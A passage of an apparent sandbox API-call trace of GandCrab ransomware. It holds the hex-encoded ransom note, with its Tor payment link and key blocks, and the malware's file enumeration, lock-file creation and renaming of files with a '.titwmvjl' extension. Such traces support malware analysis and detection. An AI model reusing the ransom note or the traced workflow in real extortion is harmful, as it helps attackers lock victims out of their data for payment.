e\x20\x54\x4f\x52\x20\x62\x72\x6f\x77\x73\x65\x72\x3a\x20\x20\x20\x68\x74\x74\x70\x3a\x2f\x2f\x67\x61\x6e\x64\x63\x72\x61\x62\x6d\x66\x65\x36\x6d\x6e\x65\x66\x2e\x6f\x6e\x69\x6f\x6e\x2f\x39\x39\x38\x61\x32\x66\x34\x35\x64\x32\x63\x61\x34\x64\x65\x66\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x7c\x20\x34\x2e\x20\x46\x6f\x6c\x6c\x6f\x77\x20\x74\x68\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x74\x68\x69\x73\x20\x70\x61\x67\x65\x20\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x2d\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x20\x0d\x0a\x20\x20\x20\x20\x0d\x0a\x0d\x0a\x4f\x6e\x20\x6f\x75\x72\x20\x70\x61\x67\x65\x20\x79\x6f\x75\x20\x77\x69\x6c\x6c\x20\x73\x65\x65\x20\x69\x6e\x73\x74\x72\x75\x63\x74\x69\x6f\x6e\x73\x20\x6f\x6e\x20\x70\x61\x79\x6d\x65\x6e\x74\x20\x61\x6e\x64\x20\x67\x65\x74\x20\x74\x68\x65\x20\x6f\x70\x70\x6f\x72\x74\x75\x6e\x69\x74\x79\x20\x74\x6f\x20\x64\x65\x63\x72\x79\x70\x74\x20\x31\x20\x66\x69\x6c\x65\x20\x66\x6f\x72\x20\x66\x72\x65\x65\x2e\x20\x0d\x0a\x0d\x0a\x0d\x0a\x41\x54\x54\x45\x4e\x54\x49\x4f\x4e\x21\x0d\x0a\x0d\x0a\x49\x4e\x20\x4f\x52\x44\x45\x52\x20\x54\x4f\x20\x50\x52\x45\x56\x45\x4e\x54\x20\x44\x41\x54\x41\x20\x44\x41\x4d\x41\x47\x45\x3a\x0d\x0a\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x4d\x4f\x44\x49\x46\x59\x20\x45\x4e\x43\x52\x59\x50\x54\x45\x44\x20\x46\x49\x4c\x45\x53\x0d\x0a\x2a\x20\x44\x4f\x20\x4e\x4f\x54\x20\x43\x48\x41\x4e\x47\x45\x20\x44\x41\x54\x41\x20\x42\x45\x4c\x4f\x57\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x6c\x41\x51\x41\x41\x42\x42\x6a\x58\x74\x68\x4a\x35\x51\x30\x77\x50\x44\x4f\x69\x52\x2f\x55\x55\x71\x42\x6a\x71\x4e\x47\x47\x52\x4d\x53\x45\x54\x66\x6e\x4b\x46\x4e\x2f\x77\x43\x30\x5a\x32\x79\x38\x75\x58\x4e\x4b\x2f\x63\x51\x52\x78\x51\x2b\x75\x78\x6a\x76\x48\x59\x6f\x52\x4e\x57\x4b\x4f\x77\x79\x70\x66\x53\x6e\x77\x69\x73\x61\x7a\x66\x6f\x32\x49\x75\x35\x76\x57\x57\x2b\x52\x43\x6b\x47\x47\x42\x31\x47\x6e\x65\x73\x51\x6b\x51\x77\x75\x54\x32\x41\x5a\x78\x56\x78\x35\x51\x59\x34\x69\x65\x2b\x6c\x65\x57\x2f\x4d\x5a\x41\x77\x47\x50\x70\x7a\x38\x2f\x37\x64\x5a\x77\x6f\x4c\x2b\x55\x71\x71\x4f\x77\x4d\x70\x54\x47\x33\x2b\x41\x6e\x76\x45\x51\x33\x4c\x4d\x6e\x49\x69\x51\x63\x70\x34\x48\x44\x66\x64\x33\x38\x4d\x50\x52\x43\x73\x52\x36\x67\x71\x63\x49\x48\x6f\x42\x70\x55\x4c\x77\x43\x33\x47\x6d\x37\x78\x7a\x74\x5a\x42\x69\x48\x47\x5a\x67\x5a\x56\x37\x4c\x6e\x61\x67\x51\x6b\x72\x4f\x41\x6c\x77\x54\x31\x36\x69\x70\x71\x4c\x31\x7a\x58\x54\x34\x6b\x4f\x79\x47\x45\x5a\x4c\x53\x6c\x71\x36\x48\x52\x57\x72\x52\x4a\x6b\x59\x53\x51\x35\x7a\x4c\x74\x50\x31\x54\x6b\x34\x68\x6d\x6d\x42\x51\x31\x66\x6f\x6a\x57\x46\x72\x63\x6f\x54\x34\x36\x78\x63\x76\x57\x2b\x33\x53\x33\x30\x6e\x56\x30\x46\x43\x51\x59\x64\x6a\x35\x68\x48\x66\x62\x50\x6c\x62\x4f\x52\x5a\x72\x69\x34\x6e\x2b\x65\x55\x43\x49\x6c\x46\x31\x74\x4b\x78\x62\x45\x69\x51\x74\x4a\x4e\x74\x66\x66\x74\x31\x76\x6b\x59\x31\x62\x6e\x78\x49\x64\x74\x45\x74\x57\x62\x49\x4e\x77\x6c\x75\x6e\x2f\x31\x39\x37\x67\x4f\x72\x72\x49\x58\x4a\x2b\x45\x70\x37\x61\x31\x73\x34\x68\x41\x54\x32\x6b\x45\x6b\x6d\x31\x48\x55\x4e\x39\x39\x46\x55\x4d\x7a\x2b\x49\x73\x51\x45\x4b\x35\x41\x44\x59\x6d\x35\x4a\x73\x42\x55\x61\x63\x59\x6c\x58\x52\x65\x77\x77\x78\x4e\x41\x55\x67\x6b\x77\x54\x51\x31\x69\x78\x57\x48\x63\x68\x36\x4c\x4e\x66\x6f\x46\x62\x78\x2f\x59\x30\x51\x67\x6c\x59\x47\x6c\x37\x36\x62\x4c\x67\x6c\x6a\x67\x6c\x50\x69\x61\x72\x2b\x46\x4d\x6d\x73\x4a\x6b\x48\x44\x78\x58\x46\x41\x64\x70\x56\x50\x4d\x4b\x54\x2b\x50\x70\x63\x6e\x32\x67\x31\x52\x65\x6f\x6d\x79\x5a\x73\x41\x77\x33\x30\x68\x4e\x4d\x79\x59\x43\x74\x79\x7a\x59\x56\x6d\x51\x7a\x4e\x56\x56\x77\x65\x76\x4d\x6b\x70\x71\x33\x44\x66\x76\x30\x76\x48\x65\x43\x6a\x58\x63\x30\x71\x67\x72\x38\x48\x53\x78\x6f\x57\x53\x6c\x56\x42\x7a\x55\x4c\x72\x47\x64\x77\x71\x7a\x61\x62\x59\x79\x6f\x72\x78\x32\x77\x62\x32\x6c\x50\x71\x6e\x43\x73\x4c\x2f\x59\x4f\x74\x63\x72\x69\x65\x50\x62\x77\x73\x57\x59\x46\x5a\x51\x47\x46\x63\x31\x4a\x6f\x71\x4a\x4a\x5a\x35\x4a\x74\x74\x4a\x35\x31\x45\x4c\x44\x52\x43\x4e\x4d\x44\x68\x74\x5a\x76\x42\x66\x61\x49\x7a\x65\x39\x54\x5a\x4c\x52\x61\x43\x42\x69\x30\x4d\x4a\x68\x54\x57\x30\x38\x74\x63\x66\x54\x6f\x62\x4a\x76\x4a\x30\x4d\x39\x34\x56\x62\x51\x44\x76\x2b\x4e\x51\x37\x6e\x6b\x78\x69\x35\x53\x33\x38\x67\x32\x46\x72\x4d\x38\x48\x75\x66\x71\x71\x49\x34\x5a\x67\x4c\x6f\x71\x43\x74\x45\x5a\x44\x67\x69\x62\x74\x42\x77\x51\x7a\x6d\x77\x30\x55\x2b\x64\x2f\x66\x69\x6d\x4d\x4e\x57\x66\x77\x4f\x55\x35\x65\x36\x77\x50\x4e\x6a\x50\x48\x5a\x6a\x73\x57\x38\x2f\x34\x48\x66\x30\x66\x67\x58\x41\x76\x42\x32\x2b\x67\x6b\x76\x52\x73\x75\x48\x53\x69\x75\x57\x53\x30\x5a\x78\x7a\x2f\x41\x42\x33\x4e\x69\x47\x4f\x64\x5a\x50\x64\x78\x72\x71\x4b\x71\x59\x49\x42\x4f\x6b\x4b\x35\x47\x48\x36\x6e\x39\x31\x51\x69\x74\x2f\x43\x66\x46\x66\x4e\x43\x68\x51\x59\x79\x73\x59\x48\x69\x45\x55\x31\x6d\x43\x4a\x2f\x46\x2f\x42\x6d\x65\x4a\x79\x37\x74\x41\x30\x55\x72\x62\x72\x6f\x4c\x53\x66\x45\x74\x7a\x53\x78\x63\x36\x4e\x73\x54\x48\x41\x65\x65\x6d\x48\x6e\x4e\x77\x38\x6d\x4c\x56\x41\x70\x52\x6e\x68\x50\x42\x36\x73\x36\x69\x5a\x66\x59\x6b\x62\x6f\x44\x4c\x45\x37\x64\x72\x56\x44\x6c\x52\x72\x66\x7a\x62\x6f\x63\x31\x56\x6e\x47\x76\x46\x66\x46\x42\x66\x2b\x5a\x37\x6b\x2b\x57\x55\x76\x6b\x6b\x68\x63\x41\x43\x5a\x69\x4b\x74\x6c\x50\x62\x70\x35\x34\x53\x2f\x73\x2b\x55\x73\x6d\x4e\x48\x6a\x55\x4e\x52\x36\x44\x78\x53\x49\x32\x31\x75\x61\x45\x50\x32\x4d\x30\x71\x75\x57\x53\x65\x46\x4a\x38\x77\x76\x61\x2b\x6e\x2f\x6c\x47\x35\x58\x75\x4c\x78\x4b\x4d\x59\x53\x44\x48\x4f\x61\x39\x79\x73\x34\x31\x48\x69\x51\x7a\x43\x33\x41\x33\x52\x67\x73\x2f\x78\x58\x4f\x74\x66\x4d\x31\x78\x6b\x56\x4d\x65\x6c\x5a\x78\x39\x64\x67\x6c\x6f\x66\x33\x34\x4a\x34\x47\x61\x6f\x45\x37\x53\x64\x34\x75\x41\x32\x6b\x79\x61\x4c\x76\x57\x62\x44\x43\x68\x55\x38\x5a\x46\x48\x48\x2b\x4c\x4f\x43\x66\x56\x41\x5a\x61\x48\x34\x55\x6e\x42\x65\x48\x63\x37\x68\x70\x36\x43\x53\x6a\x30\x4b\x77\x73\x31\x68\x30\x31\x46\x63\x58\x67\x74\x76\x6a\x43\x6e\x41\x70\x6a\x55\x37\x46\x72\x59\x53\x42\x43\x72\x77\x7a\x53\x73\x58\x4f\x55\x6b\x36\x41\x43\x34\x37\x41\x69\x56\x69\x48\x2f\x71\x45\x66\x42\x34\x44\x73\x66\x33\x72\x4e\x59\x38\x4a\x44\x62\x51\x54\x44\x72\x73\x57\x7a\x49\x39\x6f\x62\x71\x4e\x53\x4f\x46\x65\x2f\x4a\x4f\x73\x64\x4e\x4e\x56\x6c\x78\x39\x67\x51\x31\x79\x57\x59\x38\x4e\x65\x33\x51\x33\x76\x71\x62\x32\x61\x4e\x67\x6c\x67\x35\x2b\x6d\x6e\x66\x72\x4f\x50\x62\x51\x4a\x33\x66\x36\x53\x48\x79\x52\x53\x63\x68\x6f\x44\x72\x4a\x66\x7a\x38\x43\x69\x78\x75\x39\x53\x6b\x39\x38\x44\x59\x57\x66\x6a\x6e\x73\x70\x75\x35\x59\x64\x2f\x50\x78\x47\x44\x32\x55\x4f\x62\x6b\x30\x62\x68\x65\x4d\x78\x68\x52\x69\x73\x42\x63\x39\x42\x63\x7a\x53\x4f\x4c\x2b\x36\x74\x6c\x65\x62\x68\x42\x6d\x54\x68\x38\x4c\x46\x61\x56\x6f\x6d\x4b\x31\x53\x38\x75\x7a\x74\x73\x68\x52\x56\x63\x4f\x4a\x68\x70\x37\x6f\x2b\x48\x56\x35\x64\x51\x54\x35\x77\x41\x4c\x53\x79\x4c\x36\x67\x4e\x52\x47\x6e\x4f\x6a\x35\x34\x58\x51\x36\x75\x35\x36\x48\x2f\x70\x6a\x63\x2b\x54\x4b\x6c\x59\x30\x61\x57\x52\x76\x38\x76\x65\x63\x59\x44\x52\x44\x48\x4c\x55\x6e\x45\x48\x41\x42\x4c\x46\x71\x4a\x50\x36\x58\x79\x64\x31\x48\x53\x57\x32\x36\x4b\x65\x74\x6a\x56\x37\x4b\x6e\x42\x49\x68\x39\x46\x5a\x68\x67\x6b\x61\x64\x68\x71\x4f\x57\x75\x55\x67\x66\x6f\x53\x6f\x62\x72\x32\x61\x4d\x37\x59\x4f\x6a\x67\x5a\x52\x68\x44\x69\x6e\x59\x62\x31\x73\x54\x49\x49\x77\x62\x6d\x63\x64\x6f\x55\x45\x45\x62\x6a\x4c\x50\x7a\x33\x35\x2f\x70\x44\x62\x33\x72\x4b\x2f\x6a\x65\x53\x62\x43\x61\x70\x43\x68\x33\x7a\x43\x66\x66\x48\x72\x31\x68\x39\x58\x59\x57\x4c\x37\x6f\x67\x6c\x4b\x31\x49\x79\x39\x53\x6e\x50\x7a\x72\x4e\x74\x77\x35\x69\x6e\x6e\x35\x67\x46\x2f\x54\x62\x32\x32\x2f\x64\x78\x34\x2b\x32\x53\x61\x55\x48\x50\x78\x54\x79\x70\x4f\x79\x6b\x62\x66\x6a\x72\x57\x7a\x4e\x79\x4e\x34\x74\x38\x54\x70\x4a\x6d\x6a\x64\x76\x6d\x31\x41\x6c\x38\x53\x54\x53\x51\x73\x76\x76\x52\x55\x37\x45\x43\x61\x52\x37\x6e\x4c\x32\x41\x64\x42\x4e\x36\x4a\x32\x6d\x35\x6a\x6d\x64\x78\x54\x5a\x79\x64\x77\x4a\x50\x6e\x36\x31\x63\x70\x46\x39\x6b\x71\x44\x77\x2f\x74\x76\x4c\x4f\x4c\x4a\x43\x43\x7a\x56\x32\x5a\x44\x48\x33\x4f\x49\x6d\x56\x75\x69\x6e\x67\x31\x6c\x31\x65\x62\x63\x65\x42\x53\x45\x6a\x6f\x36\x52\x61\x36\x7a\x67\x75\x31\x4d\x6a\x32\x63\x58\x39\x57\x4d\x77\x31\x50\x78\x30\x53\x64\x32\x6c\x4d\x75\x77\x6d\x51\x6b\x34\x30\x36\x4f\x49\x64\x4c\x64\x55\x64\x34\x67\x6c\x71\x66\x30\x55\x48\x72\x38\x64\x66\x47\x4a\x79\x66\x62\x61\x4a\x45\x4c\x63\x74\x56\x36\x67\x36\x2b\x6e\x35\x66\x44\x71\x36\x56\x51\x41\x30\x72\x78\x78\x74\x79\x76\x6b\x43\x74\x68\x6d\x52\x4c\x73\x54\x67\x66\x4f\x6f\x58\x65\x34\x47\x37\x68\x39\x69\x4e\x75\x65\x73\x6f\x4d\x72\x30\x50\x6f\x61\x38\x6b\x4a\x5a\x54\x56\x68\x66\x33\x77\x54\x2f\x75\x75\x79\x64\x4d\x79\x55\x70\x63\x6c\x53\x49\x6a\x71\x2b\x66\x55\x49\x52\x72\x2b\x37\x6b\x2f\x57\x39\x4f\x39\x56\x73\x79\x32\x4e\x63\x78\x35\x70\x66\x2b\x53\x2b\x4d\x72\x4c\x31\x41\x6d\x35\x52\x51\x69\x33\x63\x36\x78\x46\x65\x54\x78\x33\x4d\x63\x5a\x52\x38\x30\x6e\x56\x69\x6e\x68\x75\x59\x6c\x69\x52\x51\x68\x4b\x4e\x6f\x4e\x57\x49\x32\x67\x48\x61\x47\x36\x6c\x52\x75\x7a\x2b\x51\x68\x47\x30\x52\x70\x4d\x59\x62\x7a\x42\x67\x4f\x6a\x35\x68\x69\x2f\x63\x63\x79\x55\x79\x68\x4d\x35\x66\x55\x49\x67\x63\x4a\x31\x39\x6c\x50\x64\x63\x6d\x76\x69\x78\x47\x6c\x6b\x35\x52\x38\x72\x6b\x32\x5a\x66\x78\x68\x4a\x78\x72\x46\x49\x75\x4c\x51\x54\x73\x52\x72\x61\x69\x77\x63\x44\x4d\x54\x41\x6d\x39\x63\x38\x6b\x64\x72\x2f\x59\x66\x34\x51\x6e\x2b\x62\x76\x37\x79\x4a\x5a\x34\x59\x58\x67\x42\x38\x45\x64\x6c\x31\x58\x64\x53\x6e\x4d\x72\x55\x50\x56\x35\x6f\x72\x63\x42\x78\x33\x32\x65\x73\x48\x6c\x31\x62\x46\x48\x6b\x65\x73\x39\x5a\x39\x66\x77\x6a\x46\x46\x78\x35\x42\x2f\x43\x72\x79\x6e\x36\x49\x30\x62\x54\x68\x36\x53\x78\x71\x78\x53\x4d\x4b\x66\x61\x77\x6c\x59\x6a\x57\x52\x79\x70\x35\x79\x58\x74\x4e\x69\x62\x62\x2b\x63\x7a\x78\x54\x77\x67\x30\x35\x57\x45\x56\x69\x44\x6a\x32\x5a\x4d\x35\x56\x46\x45\x35\x67\x39\x6a\x56\x78\x31\x7a\x4c\x67\x4c\x36\x72\x45\x6f\x78\x76\x62\x50\x33\x2f\x6f\x57\x73\x72\x33\x72\x72\x35\x38\x63\x71\x62\x45\x36\x49\x49\x48\x34\x6b\x33\x74\x74\x34\x75\x37\x69\x71\x7a\x66\x55\x6b\x4a\x6d\x48\x2b\x38\x31\x76\x5a\x62\x56\x7a\x59\x48\x63\x36\x48\x51\x4c\x2f\x56\x4c\x6d\x74\x2b\x59\x37\x68\x52\x6b\x36\x79\x6f\x72\x53\x6a\x31\x70\x6d\x69\x50\x46\x72\x58\x4c\x39\x39\x57\x72\x62\x6c\x41\x59\x36\x4e\x71\x79\x68\x32\x6d\x78\x2f\x6a\x4b\x44\x58\x4d\x5a\x7a\x64\x6c\x55\x51\x32\x4d\x35\x67\x6a\x56\x6c\x38\x36\x6c\x4e\x43\x6f\x33\x37\x4c\x44\x4c\x56\x48\x55\x4a\x64\x38\x73\x75\x41\x37\x78\x48\x61\x76\x47\x4b\x4d\x42\x7a\x7a\x78\x38\x35\x70\x2b\x4a\x2f\x55\x56\x39\x57\x50\x58\x6e\x72\x75\x45\x41\x3d\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d\x0d\x0a\x37\x66\x74\x44\x45\x67\x4c\x62\x2f\x5a\x53\x30\x6c\x63\x6d\x5a\x62\x48\x4d\x36\x31\x4b\x4c\x4a\x78\x51\x4f\x70\x44\x35\x34\x4b\x6b\x77\x36\x53\x62\x73\x73\x67\x66\x33\x59\x41\x57\x4f\x4d\x43\x79\x70\x2b\x4b\x59\x42\x78\x78\x47\x32\x44\x64\x39\x4d\x50\x4a\x45\x70\x44\x37\x41\x73\x6d\x56\x67\x4f\x43\x39\x52\x57\x66\x49\x52\x48\x51\x70\x51\x78\x47\x61\x31\x4c\x50\x47\x7a\x72\x45\x53\x47\x2b\x67\x67\x61\x72\x47\x58\x6f\x36\x62\x63\x47\x50\x4d\x70\x59\x30\x75\x48\x49\x6b\x6d\x67\x32\x38\x51\x55\x71\x68\x54\x73\x67\x6b\x67\x59\x58\x56\x70\x69\x44\x63\x46\x77\x69\x58\x48\x2f\x67\x6c\x4b\x56\x57\x6f\x56\x48\x4b\x43\x50\x5a\x4d\x70\x76\x37\x34\x43\x5a\x32\x4f\x38\x51\x33\x7a\x57\x61\x78\x30\x4b\x49\x52\x43\x2f\x6f\x76\x45\x74\x76\x42\x6d\x64\x6c\x53\x73\x70\x6d\x48\x4e\x76\x55\x46\x49\x4b\x6c\x30\x57\x59\x4e\x61\x41\x79\x77\x30\x53\x4b\x36\x62\x44\x4c\x6c\x46\x33\x79\x50\x71\x42\x35\x67\x6d\x61\x62\x46\x2b\x5a\x2f\x58\x4d\x47\x64\x33\x73\x67\x44\x37\x32\x35\x4a\x33\x2f\x55\x77\x42\x37\x77\x39\x78\x45\x57\x4c\x30\x79\x37\x34\x58\x71\x35\x33\x74\x48\x52\x6e\x4b\x53\x4d\x4a\x2b\x42\x6c\x31\x44\x7a\x65\x69\x71\x6f\x39\x46\x72\x64\x6e\x4d\x4b\x5a\x37\x31\x39\x47\x53\x56\x66\x4f\x2b\x54\x41\x69\x6d\x4c\x72\x37\x73\x34\x43\x75\x47\x41\x73\x70\x43\x61\x6a\x71\x52\x54\x77\x56\x66\x50\x66\x32\x30\x78\x42\x53\x55\x69\x44\x49\x74\x4c\x4f\x4a\x64\x4e\x41\x46\x42\x6e\x56\x71\x72\x4d\x5a\x6f\x52\x2b\x53\x33\x4e\x4c\x47\x59\x6d\x64\x61\x52\x33\x30\x66\x52\x50\x39\x33\x79\x71\x50\x4d\x77\x4c\x4f\x4c\x6a\x54\x36\x4f\x36\x72\x31\x78\x57\x34\x65\x5a\x78\x54\x7a\x50\x4a\x31\x66\x62\x44\x4c\x30\x39\x30\x30\x50\x66\x36\x53\x30\x61\x7a\x37\x4b\x41\x76\x6f\x54\x66\x46\x70\x35\x32\x47\x50\x44\x4b\x78\x35\x43\x68\x42\x75\x64\x72\x6f\x4d\x31\x6f\x4f\x36\x69\x71\x56\x77\x75\x6d\x32\x71\x42\x6c\x76\x5a\x4c\x77\x4b\x72\x74\x4d\x79\x70\x53\x38\x45\x31\x66\x6d\x6c\x58\x7a\x6d\x5a\x37\x71\x64\x34\x42\x75\x77\x75\x67\x57\x43\x77\x59\x30\x7a\x56\x62\x35\x51\x66\x76\x64\x78\x47\x4c\x53\x75\x6a\x37\x62\x69\x41\x77\x44\x50\x69\x71\x54\x4f\x4c\x4b\x50\x47\x67\x6a\x34\x32\x59\x57\x4b\x62\x2b\x2b\x41\x6c\x53\x76\x48\x75\x69\x7a\x34\x45\x59\x45\x71\x42\x45\x36\x69\x4e\x6e\x41\x4e\x66\x68\x77\x4e\x51\x4c\x49\x45\x7a\x31\x52\x6b\x48\x4b\x79\x62\x75\x4d\x4b\x70\x31\x52\x31\x6c\x51\x2f\x70\x75\x51\x65\x65\x7a\x77\x45\x69\x58\x54\x45\x43\x72\x37\x72\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d") returned 4273 [0094.072] WriteFile (in: hFile=0x2b4, lpBuffer=0x2300000*, nNumberOfBytesToWrite=0x2162, lpNumberOfBytesWritten=0x259efe0, lpOverlapped=0x0 | out: lpBuffer=0x2300000*, lpNumberOfBytesWritten=0x259efe0*=0x2162, lpOverlapped=0x0) returned 1 [0094.073] CloseHandle (hObject=0x2b4) returned 1 [0094.073] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.073] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0094.073] GetSystemTime (in: lpSystemTime=0x1e70400 | out: lpSystemTime=0x1e70400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0x27, wMilliseconds=0x17c)) [0094.073] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0094.073] GetWindowsDirectoryW (in: lpBuffer=0x2410000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0094.073] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2410200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2410600, lpMaximumComponentLength=0x2410608, lpFileSystemFlags=0x2410604, lpFileSystemNameBuffer=0x2410400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2410600*=0xd2ca4def, lpMaximumComponentLength=0x2410608*=0xff, lpFileSystemFlags=0x2410604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0094.074] wsprintfW (in: param_1=0x1e70000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\d2ca4a09d2ca4deb61a.lock") returned 73 [0094.074] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\pictures\\v_u2\\r7ldy-y1htwn\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x2b4 [0094.074] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.075] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.075] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\") returned 49 [0094.075] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\*" [0094.075] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\*", fInfoLevelId=0x1, lpFindFileData=0x259effc, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x259effc) returned 0x503738 [0094.075] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0094.075] FindNextFileW (in: hFindFile=0x503738, lpFindFileData=0x259effc | out: lpFindFileData=0x259effc) returned 1 [0094.076] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0094.076] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0094.076] FindNextFileW (in: hFindFile=0x503738, lpFindFileData=0x259effc | out: lpFindFileData=0x259effc) returned 1 [0094.076] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2=".") returned 1 [0094.076] lstrcmpW (lpString1="d2ca4a09d2ca4deb61a.lock", lpString2="..") returned 1 [0094.076] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\", lpString2="d2ca4a09d2ca4deb61a.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\d2ca4a09d2ca4deb61a.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\d2ca4a09d2ca4deb61a.lock" [0094.076] lstrlenW (lpString=".titwmvjl") returned 9 [0094.076] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\d2ca4a09d2ca4deb61a.lock") returned 73 [0094.076] VirtualAlloc (lpAddress=0x0, dwSize=0xd2, flAllocationType=0x3000, flProtect=0x4) returned 0x1e70000 [0094.076] wsprintfW (in: param_1=0x1e70000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\d2ca4a09d2ca4deb61a.lock.titwmvjl") returned 82 [0094.076] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\d2ca4a09d2ca4deb61a.lock") returned 73 [0094.076] lstrlenW (lpString=".lock") returned 5 [0094.076] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2410000 [0094.076] wsprintfW (in: param_1=0x2410000, param_2="%ws " | out: param_1=".lock ") returned 6 [0094.076] VirtualFree (lpAddress=0x2410000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.076] VirtualFree (lpAddress=0x1e70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0094.077] FindNextFileW (in: hFindFile=0x503738, lpFindFileData=0x259effc | out: lpFindFileData=0x259effc) returned 1 [0094.077] lstrcmpW (lpString1="dp__bieng9", lpString2=".") returned 1 [0094.077] lstrcmpW (lpString1="dp__bieng9", lpString2="..") returned 1 [0094.077] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\", lpString2="dp__bieng9" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\dp__bieng9") returned="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\dp__bieng9" [0094.077] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\dp__bieng9", lpString2="\\" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\dp__bieng9\\") returned="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\V_u2\\r7lDY-Y1hTWn\\dp__bieng9\\" [0094.077] VirtualAlloc (lpAddress=0x0, dwSize=0x201, flAllocationType=0x3000, flProtect=0x40) returned 0x1e70000 [0094.077] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0094.077] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=42, fCreate=0 | out: pszPath="C:\\Program Files (x86)") returned 1 [0094.077] LoadLibraryA (lpLibFileName="shell32.dll") returned 0x75310000 [0094.077] SHGetSpecialFolderPathW (in: hwnd=0x0, pszPath=0x1e70000, csidl=43, fCreate=0 | out: 